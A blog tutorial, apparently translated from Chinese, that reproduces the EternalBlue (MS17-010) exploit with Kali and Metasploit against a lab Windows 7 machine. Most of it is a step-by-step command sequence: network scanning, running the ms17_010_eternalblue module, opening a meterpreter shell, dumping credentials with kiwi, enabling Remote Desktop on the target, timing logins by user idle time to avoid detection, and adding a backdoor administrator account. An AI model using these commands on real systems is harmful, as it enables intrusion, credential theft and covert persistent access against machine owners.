明国三年一场雨

明国三年一场雨

热爱技术分享
telegram
email

Kali--MSF-EternalBlue In-Depth Analysis (Reproduction, Demonstration, Remote, Backdoor, Packing, Fix)

  1. Overview of Eternal Blue
    Eternal Blue, which broke out on the evening of April 14, 2017, is a vulnerability that exploits the SMB protocol of Windows systems to gain the highest level of system privileges and control the invaded computer. Even on May 12, 2017, criminals used the modified "Eternal Blue" to create the WannaCry program, which caused widespread damage worldwide, affecting institutions such as schools, large enterprises, and governments. The only way to recover the files was to pay a high ransom. However, Microsoft patched the program shortly after its release.

  2. SMB Protocol
    SMB (Server Message Block) is a protocol server message block. It is a client/server, request/response protocol. Through the SMB protocol, files, printers, named pipes, and other resources can be shared between computers. The network neighborhood on the computer relies on SMB. The SMB protocol works at the application layer and session layer and can be used on top of the TCP/IP protocol. SMB uses TCP port 139 and TCP port 445.

  3. Preparation
    Virtual machine: VMware
    Target machine: Windows 7 (IP: 192.168.184.138) image download https://msdn.itellyou.cn/
    Attacker machine: Kali (IP: 192.168.184.130)
    Tools: nmap and Metasploit (MSF) in Kali

  4. Vulnerability Reproduction

    1. Host discovery
      a. Preconditions: Disable the firewall on Win7.

      Not disabling the firewall may result in nmap not being able to scan its ports and MSF not being able to exploit the Eternal Blue vulnerability.

      e23cdf6b9ef8483dbaab85280976b2d8

      You can use ipconfig and ifconfig to check the IP addresses of Win7 and Kali respectively:

      Win7

      48a16ab60d3542bf84786264db100530

      46eb54d6f0ea4f4b98a85a6c549d1a8f

    2. Host discovery using nmap in Kali

      IP address: +

      8de5ec95fc724470b7bef85661bc6a25

      4b4ae4984c224383918639575ade095a

      Class A: 10.0.0.0~10.255.255.255
      Class B: 172.16.0.0~173.31.255.255
      Class C: 192.168.0.0~192.168.255.255
      /24 represents 24 ones, which means the subnet mask is 255.255.255.0
      192.168.184.0/24: The number after "/" controls the mask of the previous IP address, indicating how many bits can vary in the back.

      nmap -sP 192.168.184.0/24  #sP (ping scan)
      
    3. Host discovery using Metasploit (MSF) in Kali

      msfconsole                                 // Start MSF
      use auxiliary/scanner/discovery/arp_sweep  // Use the module
      set rhosts 192.168.184.0/24   // Set the scan range
      set threads 50             // Increase the threads
      run                        // Run
      

      MSF searches for the Eternal Blue vulnerability by entering search ms17-010 (Microsoft Eternal Blue code ms17-010)

      8f84118572c44dccbe8c72bc34a800fa

      1. blue is the Eternal Blue vulnerability.
      2. psexec is an exploitable JavaScript (JS) module.
      3. command runs cmd.
      4. The last one is a detection module.

      a. First, let's use the detection module to see if our Win7 machine may have vulnerabilities.

      use exploit/windows/smb/ms17_010_eternalblue
      show options 
      set rhosts 192.168.184.138
      exploit/run
      

      ddbdc3fe73cd43ffacde905d7542aeae

      3dfa57568df044f8ac84451816afa5da

      f5d8bd05408245419f687026820fafc2

      If the operation is successful, meterpreter > will appear.
      Meterpreter is an extension module of Metasploit that can call some functions of Metasploit to penetrate the target system more deeply, such as entering cmd, capturing the screen, uploading/downloading files, creating persistent backdoors, etc.

      meterpreter > shell
      chcp 65001  // Convert the encoding to avoid garbled characters
      ipconfig  # View IP
      whoami    # View the current username
      
    4. Capture the screen

      meterpreter > screenshot   # Take a screenshot
      

      3493fa2eeaab4206aa4f52f01c85e297

    5. Upload files

      meterpreter > upload user.txt c://
      

      cde448f0dc1a406fa3761972a95471ab

    6. Remote login
      View passwords using the kiwi module:

      Using the kiwi module requires system administrator privileges:

      meterpreter > load kiwi // Load the kiwi module
      Loading extension kiwi...Success.
      creds_all  # List all credentials
      exit   # Exit
      

      62116dcd7485412c9ee980ac048777bb

      Start port 3389 of the target machine with MSF

      By default, Windows Remote Desktop is not allowed to connect:

      a31c8778455c4fcb81ebf5d319142ab3

      We can't manually allow remote connections on Win7, otherwise, how can we call ourselves hackers, hahaha...

      Start port 3389 of Win7, which is the Remote Desktop Protocol, and execute the remote connection command:

      meterpreter > run post/windows/manage/enable_rdp  // Enable port 3389 Remote Desktop on the target host
      meterpreter > idletime  // Check the idle time of the remote user, and perform remote login when the idle time is long to reduce the risk of being discovered
      

      f4d49ffad874458cbc72278a9334fe3a

      c9008e1a7aa34328a053c8a32c5e2cc3

      04d631dfda364caeabe7c0ba4b947a09

      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
      

      Since this way we will log in to the Win7 user and kick out the user k on Win7:
      Create a user:

      So we need to create a new user for login:

      meterpreter > shell            # Enter the command line
      net user kill 123 /add         # Create a new user kill with password 123
      net  localgroup  administrators kill /add # Add the user kill to the local administrators group of Win7 to obtain administrator privileges
      net user               # View users
      
      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
      
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.